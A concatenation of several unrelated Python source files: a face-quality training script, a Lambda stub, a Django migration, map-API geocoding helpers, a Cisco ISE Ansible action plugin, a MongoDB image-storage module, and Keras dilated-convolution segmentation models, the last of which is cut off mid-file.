import torch.optim as optim
import math
import cv2
import torchvision.transforms as transforms
from dataset.dataset import ImageFolder
from config import config
from models.model_resnet import ResNet, FaceQuality
from models.metrics import GaussianFace
from models.focal import FocalLoss
from util.utils import *
import torch.distributed as dist
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
from util.cosine_lr_scheduler import CosineDecayLR
from tqdm import tqdm
import os
import random
import numbers
import shutil
import argparse
import numpy as np
from ptflops import get_model_complexity_info
def load_state_dict(model, state_dict):
all_keys = {k for k in state_dict.keys()}
for k in all_keys:
if k.startswith('module.'):
state_dict[k[7:]] = state_dict.pop(k)
model_dict = model.state_dict()
pretrained_dict = {k:v for k, v in state_dict.items() if k in model_dict and v.size() == model_dict[k].size()}
if len(pretrained_dict) == len(model_dict):
print("all params loaded")
else:
not_loaded_keys = {k for k in model_dict.keys() if k not in pretrained_dict}
print("not loaded keys:", not_loaded_keys)
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
def train():
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
writer = SummaryWriter(config.LOG_ROOT)
train_transform = transforms.Compose([
transforms.RandomApply([transforms.RandomResizedCrop(112, scale=(0.95, 1), ratio=(1, 1))]),
transforms.Resize(112),
transforms.RandomHorizontalFlip(),
transforms.RandomGrayscale(0.01),
transforms.ToTensor(),
transforms.Normalize(mean = config.RGB_MEAN, std = config.RGB_STD),
])
dataset_train = ImageFolder(config.TRAIN_FILES, train_transform)
train_loader = torch.utils.data.DataLoader(
dataset_train, batch_size = config.BATCH_SIZE, pin_memory = True, shuffle=True,
num_workers = 8, drop_last = True
)
NUM_CLASS = train_loader.dataset.classes
print("Number of Training Classes: {}".format(NUM_CLASS))
QUALITY = FaceQuality(512 * 7 * 7)
BACKBONE = ResNet(num_layers=100, feature_dim=512)
flops, params = get_model_complexity_info(BACKBONE, (3, 112, 112), as_strings=True, print_per_layer_stat=False)
print('BACKBONE FLOPs:', flops)
print('BACKBONE PARAMS:', params)
HEAD = GaussianFace(in_features = config.EMBEDDING_SIZE, out_features = NUM_CLASS)
LOSS = FocalLoss()
if config.BACKBONE_RESUME_ROOT and config.HEAD_RESUME_ROOT:
print("=" * 60)
if os.path.isfile(config.BACKBONE_RESUME_ROOT):
print("Loading Backbone Checkpoint '{}'".format(config.BACKBONE_RESUME_ROOT))
checkpoint = torch.load(config.BACKBONE_RESUME_ROOT)
load_state_dict(BACKBONE, checkpoint)
else:
print("No Checkpoint Found at '{}' Please Have a Check or Continue to Train from Scratch".format(config.BACKBONE_RESUME_ROOT))
if os.path.isfile(config.HEAD_RESUME_ROOT):
print("Loading Head Checkpoint '{}'".format(config.HEAD_RESUME_ROOT))
checkpoint = torch.load(config.HEAD_RESUME_ROOT)
load_state_dict(HEAD, checkpoint)
else:
print("No Checkpoint Found at '{}' Please Have a Check or Continue to Train from Scratch".format(config.HEAD_RESUME_ROOT))
print("=" * 60)
else:
print('Error: Pretrained backbone and head are necessary for quality training')
return
BACKBONE = nn.DataParallel(BACKBONE, device_ids = config.BACKBONE_GPUS)
BACKBONE = BACKBONE.cuda(config.BACKBONE_GPUS[0])
QUALITY = nn.DataParallel(QUALITY, device_ids = config.BACKBONE_GPUS)
QUALITY = QUALITY.cuda(config.BACKBONE_GPUS[0])
HEAD = nn.DataParallel(HEAD, device_ids = config.HEAD_GPUS, output_device=config.HEAD_GPUS[0])
HEAD = HEAD.cuda(config.HEAD_GPUS[0])
BACKBONE.eval()
OPTIMIZER = optim.SGD([{'params': QUALITY.parameters(), 'lr': config.QUALITY_LR}, {'params': HEAD.parameters(), 'lr': config.QUALITY_LR}], momentum=config.MOMENTUM)
DISP_FREQ = len(train_loader) // 100
NUM_EPOCH_WARM_UP = config.NUM_EPOCH_WARM_UP
NUM_BATCH_WARM_UP = len(train_loader) * NUM_EPOCH_WARM_UP
batch = 0
step = 0
scheduler = CosineDecayLR(OPTIMIZER, T_max=10*len(train_loader), lr_init = config.QUALITY_LR, lr_min = 1e-5, warmup = NUM_BATCH_WARM_UP)
for epoch in range(config.NUM_EPOCH):
HEAD.train()
QUALITY.train()
arcface_losses = AverageMeter()
confidences = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
scaler = torch.cuda.amp.GradScaler()
for inputs, labels in tqdm(iter(train_loader)):
inputs = inputs.cuda(config.BACKBONE_GPUS[0])
labels = labels.cuda(config.HEAD_GPUS[0])
with torch.no_grad():
features, fc = BACKBONE(inputs, True)
with torch.cuda.amp.autocast():
confidence = QUALITY(fc)
outputs = HEAD(confidence.cuda(config.HEAD_GPUS[0]), features.cuda(config.HEAD_GPUS[0]), labels, True)
arcface_loss = LOSS(outputs, labels)
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels, topk = (1, 5))
arcface_losses.update(arcface_loss.data.item(), inputs.size(0))
confidences.update(torch.mean(confidence).data.item(), inputs.size(0))
top1.update(prec1.data.item(), inputs.size(0))
top5.update(prec5.data.item(), inputs.size(0))
loss = arcface_loss
# compute gradient and do SGD step
OPTIMIZER.zero_grad()
#loss.backward()
#OPTIMIZER.step()
scaler.scale(loss).backward()
scaler.step(OPTIMIZER)
scaler.update()
if ((batch + 1) % DISP_FREQ == 0) and batch != 0:
print("=" * 60)
print('Epoch {}/{} Batch {}/{}\t'
'Training Loss {arcface_loss.val:.4f}({arcface_loss.avg:.4f})\t'
'Training Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Training Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch + 1, config.NUM_EPOCH, batch + 1, len(train_loader) * config.NUM_EPOCH,
arcface_loss = arcface_losses, top1 = top1, top5 = top5))
print("=" * 60)
batch += 1 # batch index
scheduler.step(batch)
if batch % 1000 == 0:
print(OPTIMIZER)
# training statistics per epoch (buffer for visualization)
epoch_loss = arcface_losses.avg
epoch_acc = top1.avg
writer.add_scalar("Training_Loss", epoch_loss, epoch + 1)
writer.add_scalar("Training_Accuracy", epoch_acc, epoch + 1)
print("=" * 60)
print('Epoch: {}/{}\t'
'Training Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Training Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Training Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch + 1, config.NUM_EPOCH, loss = arcface_losses, top1 = top1, top5 = top5))
print("=" * 60)
# save checkpoints per epoch
curTime = get_time()
if not os.path.exists(config.MODEL_ROOT):
os.makedirs(config.MODEL_ROOT)
torch.save(QUALITY.state_dict(), os.path.join(config.MODEL_ROOT, "Quality_Epoch_{}_Batch_{}_Time_{}_checkpoint.pth".format(epoch + 1, batch, curTime)))
torch.save(HEAD.state_dict(), os.path.join(config.MODEL_ROOT, "Head_Epoch_{}_Batch_{}_Time_{}_checkpoint.pth".format(epoch + 1, batch, curTime)))
if __name__ == "__main__":
train()
|
# import boto3
# s3 = boto3.client('s3')
# def handler(event, context):
# response = s3.get_object(
# Bucket='gtfs-bussim-347664766527',
# Key='config.sh',
# )
# print(str(response.get("Body").read()))
import pandas as pd
def handler(event, context):
print("hi")
df = pd.DataFrame([1, 2])
return "hi"
|
# Generated by Django 2.0.1 on 2018-01-21 08:57
from django.db import migrations, models
import django_jalali.db.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Bar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('date', django_jalali.db.models.jDateField()),
],
),
migrations.CreateModel(
name='BarTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('datetime', django_jalali.db.models.jDateTimeField()),
],
),
]
|
import os
import requests
import json
import time
from sachima.log import logger
from sachima import conf
from io import BytesIO
BAIDU_GEO_TOKEN = conf.get("BAIDU_GEO_TOKEN")
QQ_GEO_TOKEN = conf.get("QQ_GEO_TOKEN")
AMAP_GEO_TOKEN = conf.get("AMAP_GEO_TOKEN")
def poi_compound_dict(
dim={"K001": "subway", "K002": "hospital", "K003": "school"},
dis=[500, 1000],
lat=31.191869,
lng=121.446756,
onlycnt=False,
onlyfarest=True,
savetofile=False,
):
"""
DIM = {
"K001": "subway",
"K002": "hospital",
"K003": "school"
}
DIS = [500, 1000, 1500, 2000]
lat = 31.191869
lng = 121.446756
"""
res = {}
for k in dim:
for d in dis:
key = k + "_" + str(d) # eg. K001_1000
key_cnt = key + "_CNT" # eg. K001_1000_CNT
poi_json = poi(lat, lng, dim.get(k), radius=d)
if onlycnt is False:
if onlyfarest is False:
res[key] = str(poi_json)
elif d == max(dis):
res[key] = str(poi_json)
res[key_cnt] = poi_json.get("count")
return res
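# A minimal usage sketch (no network call shown; a real call needs AMAP_GEO_TOKEN):
# with dim={"K001": "subway"} and dis=[500, 1000], the returned dict is expected to
# hold the count keys "K001_500_CNT" and "K001_1000_CNT", plus (because
# onlyfarest=True by default) the raw POI JSON only under "K001_1000".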
def poi(lat, lng, keywords, radius=1000):
"""
Get poi information from amap \n
https://lbs.amap.com/api/webservice/guide/api/search \n
"""
logger.info((lat, lng, keywords, radius))
if AMAP_GEO_TOKEN is None:
logger.info("error: Must config AMAP_GEO_TOKEN in sachima_config.py")
raise "Must config AMAP_GEO_TOKEN in sachima_config.py"
url = "https://restapi.amap.com/v3/place/around"
values = {
"key": AMAP_GEO_TOKEN,
"location": "{},{}".format(lng, lat),
"keywords": keywords,
"types": "",
"radius": radius, # default one mile
}
try:
r = requests.get(url, values).json()
logger.debug(r)
if r.get("info") == 'USER_DAILY_QUERY_OVER_LIMIT':
raise RuntimeError('USER_DAILY_QUERY_OVER_LIMIT')
return r
except Exception as e:
raise e
def panorama(lat, lng):
"""
Panorama information query
return Image Buffer
you can open the buffer use PIL.Image.open(buffer)
"""
if BAIDU_GEO_TOKEN is None:
logger.info("error: Must config BAIDU_GEO_TOKEN in sachima_config.py")
raise "Must config BAIDU_GEO_TOKEN in sachima_config.py"
url = "http://api.map.baidu.com/panorama/v2"
values = {"ak": BAIDU_GEO_TOKEN, "fov": 180, "location": "{},{}".format(lng, lat)}
try:
logger.info("Fetching {},{} panorama picture ...".format(lat, lng))
r = requests.get(url, values).content
b = BytesIO()
b.write(r)
return b
except Exception as e:
raise e
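# Hedged usage sketch for panorama(), not part of the original module: it
# assumes a valid BAIDU_GEO_TOKEN is configured and that Pillow is installed
# (it is not imported by this module).
#
#   from PIL import Image
#   buf = panorama(31.191869, 121.446756)
#   Image.open(buf).show()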
def fetchBaiduLatLng(address):
"""
Use baidu map api to get the latitude and longitude of city from the Internet. \n
http://lbsyun.baidu.com/index.php?title=webapi \n
"""
    if BAIDU_GEO_TOKEN is None:
        logger.error("Must config BAIDU_GEO_TOKEN in sachima_config.py")
        raise ValueError("Must config BAIDU_GEO_TOKEN in sachima_config.py")
values = {
"address": address,
"ret_coordtype": "",
"ak": BAIDU_GEO_TOKEN,
"sn": "",
"precise": 1,
"output": "json",
"callback": "",
}
url = "http://api.map.baidu.com/geocoder/v2/"
try:
r = requests.get(url, params=values).json()
logger.info(r)
if r.get("status") != 0:
return {}
else:
return {
"baidu_lat": r.get("result").get("location").get("lat"),
"baidu_lng": r.get("result").get("location").get("lng"),
"baidu_precise": r.get("result").get("precise"),
"baidu_confidence": r.get("result").get("confidence"),
"baidu_comprehension": r.get("result").get("comprehension"),
"baidu_level": r.get("result").get("level"),
"baidu_status": r.get("status"),
}
except Exception as e:
logger.info("fetchBaiduGeo for %s error: %s" % (address, e))
raise e
def fetchQQLatLng(address):
"""
Use qq map api to get latitude and longitude from the Internet.
https://lbs.qq.com/miniProgram/jsSdk/jsSdkGuide/methodGeocoder
"""
    if QQ_GEO_TOKEN is None:
        logger.error("Must config QQ_GEO_TOKEN in sachima_config.py")
        raise ValueError("Must config QQ_GEO_TOKEN in sachima_config.py")
values = {"key": QQ_GEO_TOKEN, "output": "json", "address": address}
url = "https://apis.map.qq.com/ws/geocoder/v1/"
try:
r = requests.get(url, params=values).json()
if r.get("status") == 347:
return {}
else:
return {
"qq_lat": r.get("result").get("location").get("lat"),
"qq_lng": r.get("result").get("location").get("lng"),
"qq_title": r.get("result").get("title"),
"qq_adcode": r.get("result").get("ad_info").get("adcode"),
"qq_province": r.get("result")
.get("address_components")
.get("province"),
"qq_city": r.get("result").get("address_components").get("city"),
"qq_district": r.get("result")
.get("address_components")
.get("district"),
"qq_street": r.get("result").get("address_components").get("street"),
"qq_street_number": r.get("result")
.get("address_components")
.get("street_number"),
"qq_similarity": r.get("result").get("similarity"),
"qq_deviation": r.get("result").get("deviation"),
"qq_reliability": r.get("result").get("reliability"),
"qq_level": r.get("result").get("level"),
"qq_status": r.get("status"),
"qq_message": r.get("message"),
}
except Exception as e:
logger.info("fetchQQGeo for %s error: %s!" % (address, e))
raise e
def fetchAmapLatLng(address):
"""
    Use amap api to get latitude and longitude from the Internet.
"""
logger.info("fetching {} amap geo info".format(address))
    if AMAP_GEO_TOKEN is None:
        logger.error("Must config AMAP_GEO_TOKEN in sachima_config.py")
        raise ValueError("Must config AMAP_GEO_TOKEN in sachima_config.py")
par = {"address": address, "key": AMAP_GEO_TOKEN}
base = "http://restapi.amap.com/v3/geocode/geo"
r = requests.get(base, par).json()
geocodes = {}
GPS = [None, None]
if r.get("count") != "0":
geocodes = r.get("geocodes")[0]
GPS = geocodes.get("location").split(",")
return {
"amap_lat": GPS[1],
"amap_lng": GPS[0],
"amap_status": r.get("status"),
"amap_info": r.get("info"),
"amap_infocode": r.get("infocode"),
"amap_count": r.get("count"),
"amap_formatted_address": geocodes.get("formatted_address"),
"amap_country": geocodes.get("country"),
"amap_province": geocodes.get("province"),
"amap_citycode": geocodes.get("citycode"),
"amap_city": geocodes.get("city"),
"amap_adcode": geocodes.get("adcode"),
"amap_street": str(geocodes.get("street")),
"amap_number": str(geocodes.get("number")),
"amap_level": geocodes.get("level"),
}
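if __name__ == "__main__":
    # Hedged usage sketch, not part of the original module: these calls hit
    # external web APIs and require the corresponding *_GEO_TOKEN values to be
    # set in sachima_config.py. The address and the dim/dis values below are
    # illustrative only.
    print(fetchAmapLatLng("Shanghai"))
    print(poi_compound_dict(dim={"K001": "subway"}, dis=[500], onlycnt=True))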
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.action import ActionBase
try:
from ansible_collections.ansible.utils.plugins.module_utils.common.argspec_validate import (
AnsibleArgSpecValidator,
)
except ImportError:
ANSIBLE_UTILS_IS_INSTALLED = False
else:
ANSIBLE_UTILS_IS_INSTALLED = True
from ansible.errors import AnsibleActionFail
from urllib.parse import quote
import time
from ansible_collections.cisco.ise.plugins.module_utils.personas_utils import (
Node,
ISEDeployment,
)
argument_spec = dict(
primary_ip=dict(type="str", required=True),
primary_username=dict(type="str", required=True),
primary_password=dict(type="str", required=True),
name=dict(type="str", required=True),
ip=dict(type="str", required=True),
hostname=dict(type="str", required=True),
username=dict(type="str", required=True),
password=dict(type="str", required=True),
ise_verify=dict(type="bool", default=True),
ise_version=dict(type="str", default="3.0.0"),
ise_wait_on_rate_limit=dict(type="bool", default=True), # TODO: verify what the true default value should be
)
required_if = []
required_one_of = []
mutually_exclusive = []
required_together = []
class ActionModule(ActionBase):
def __init__(self, *args, **kwargs):
if not ANSIBLE_UTILS_IS_INSTALLED:
raise AnsibleActionFail("ansible.utils is not installed. Execute 'ansible-galaxy collection install ansible.utils'")
super(ActionModule, self).__init__(*args, **kwargs)
self._supports_async = False
self._result = None
# Checks the supplied parameters against the argument spec for this module
def _check_argspec(self):
aav = AnsibleArgSpecValidator(
data=self._task.args,
schema=dict(argument_spec=argument_spec),
schema_format="argspec",
schema_conditionals=dict(
required_if=required_if,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive,
required_together=required_together,
),
name=self._task.action,
)
valid, errors, self._task.args = aav.validate()
if not valid:
raise AnsibleActionFail(errors)
def run(self, tmp=None, task_vars=None):
self._task.diff = False
self._result = super(ActionModule, self).run(tmp, task_vars)
self._result["changed"] = False
self._check_argspec()
primary_node = dict(ip=self._task.args.get("primary_ip"),
username=self._task.args.get("primary_username"),
password=self._task.args.get("primary_password"),
)
other_node = dict(name=self._task.args.get("name"),
ip=self._task.args.get("ip"),
hostname=self._task.args.get("hostname"),
username=self._task.args.get("username"),
password=self._task.args.get("password"),
)
ise_deployment = ISEDeployment()
ise_deployment.add_primary(primary_node)
ise_deployment.add_node(other_node)
ise_deployment.export_import_default_self_signed_server_cert()
response = "The certificate for {name} was exported successfully to the primary node".format(name=self._task.args.get("name"))
self._result.update(dict(ise_response=response))
return self._result
|
# Copyright 2019:
# Marcelo Lerendegui <marcelo@lerendegui.com>
# WeiHsien Lee <weihsien.lee@duke.edu>
# Yihang Xin <yihang.xin@duke.edu>
# This file is part of BME547_Final_Project.
#
# BME547_Final_Project is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or any later version.
#
# BME547_Final_Project is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BME547_Final_Project.
# If not, see <https://www.gnu.org/licenses/>.
from pymodm import connect, MongoModel, fields
import os
from server.database_model import Image
from bson import ObjectId
def init():
""" connect to online database
connect to online database
"""
mdb_user = os.environ.get('MONGODB_USER')
mdb_pass = os.environ.get('MONGODB_PASS')
connection_str = "".join([
"mongodb+srv://",
mdb_user,
":",
mdb_pass,
"@bme547-q262c.mongodb.net/Database"
])
connect(connection_str)
def add_image(
filename: str = None,
img_format: str = None,
description: str = None,
size: str = None,
timestamp=None,
data: str = None,
user_hash: str = None
) -> bool:
"""add image to database
add image to database
:param u: image to add
:type u: Image
:return: True on success, False otherwise
:rtype: bool
"""
image_to_add = Image(
filename=filename,
img_format=img_format,
description=description,
size=size,
timestamp=timestamp,
data=data,
user_hash=user_hash,
)
try:
image_to_add.save()
    except Exception:
return False
return True
def image_exists(image_id: str, user_hash: str) -> bool:
"""check if image already exists
check if image already exists
:param pid: image id to check
:type pid: str
:return: True if image exists, False otherwise
:rtype: bool
"""
image = get_image(image_id, user_hash)
return image is not None
def get_image(image_id: str, user_hash: str) -> Image:
"""fetch image by image id
fetch image by image id
:param pid: image id to fetch
:type pid: str
:return: image on success, None otherwise
:rtype: Image
"""
try:
image = Image.objects.raw({'_id': ObjectId(image_id)}).first()
if image.user_hash != user_hash:
image = None
    except Exception:
image = None
return image
def get_all_user_images(user_hash: str):
"""fetch all images for input user
TODO: Check if return type is a list or not
:param user_hash: hash of a user
:type user_hash: str
:return: list of images
:rtype: list
"""
try:
image = Image.objects.raw({'user_hash': user_hash})
    except Exception:
image = None
return image
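if __name__ == "__main__":
    # Hedged usage sketch, not part of the original module: it requires the
    # MONGODB_USER / MONGODB_PASS environment variables and network access to
    # the Atlas cluster hard-coded in init(). All field values are illustrative.
    init()
    ok = add_image(
        filename="cell.jpg",
        img_format="JPEG",
        description="raw microscope image",
        size="640x480",
        timestamp="2019-04-01T12:00:00",
        data="<base64-encoded image data>",
        user_hash="demo_user_hash",
    )
    print("saved:", ok)
    for img in get_all_user_images("demo_user_hash") or []:
        print(img.filename)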
|
import warnings
from keras import backend as K
from keras.models import Model
from keras.layers import Convolution2D, MaxPooling2D, Input, AtrousConvolution2D
from keras.layers import Dropout, UpSampling2D, ZeroPadding2D
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from datasets import CONFIG
from utils import softmax
# CITYSCAPES MODEL
def get_dilation_model_cityscapes(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(16, 16))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ctx_conv5_1')(h)
h = ZeroPadding2D(padding=(32, 32))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(32, 32), activation='relu', name='ctx_conv6_1')(h)
h = ZeroPadding2D(padding=(64, 64))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(64, 64), activation='relu', name='ctx_conv7_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
h = Convolution2D(classes, 1, 1, name='ctx_final')(h)
    # the following two layers emulate a grouped deconvolution layer, which
    # was never implemented in Keras; since it is just a fixed gaussian
    # upsampling, trainable=False is recommended
h = UpSampling2D(size=(8, 8))(h)
logits = Convolution2D(classes, 16, 16, border_mode='same', bias=False, trainable=False, name='ctx_upsample')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_cityscapes')
return model
# PASCAL VOC MODEL
def get_dilation_model_voc(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, activation='relu', name='fc-final')(h)
h = ZeroPadding2D(padding=(33, 33))(h)
h = Convolution2D(2 * classes, 3, 3, activation='relu', name='ct_conv1_1')(h)
h = Convolution2D(2 * classes, 3, 3, activation='relu', name='ct_conv1_2')(h)
h = AtrousConvolution2D(4 * classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ct_conv2_1')(h)
h = AtrousConvolution2D(8 * classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ct_conv3_1')(h)
h = AtrousConvolution2D(16 * classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ct_conv4_1')(h)
h = AtrousConvolution2D(32 * classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ct_conv5_1')(h)
h = Convolution2D(32 * classes, 3, 3, activation='relu', name='ct_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ct_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_voc12')
return model
# KITTI MODEL
def get_dilation_model_kitti(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ctx_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_kitti')
return model
# CAMVID MODEL
def get_dilation_model_camvid(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
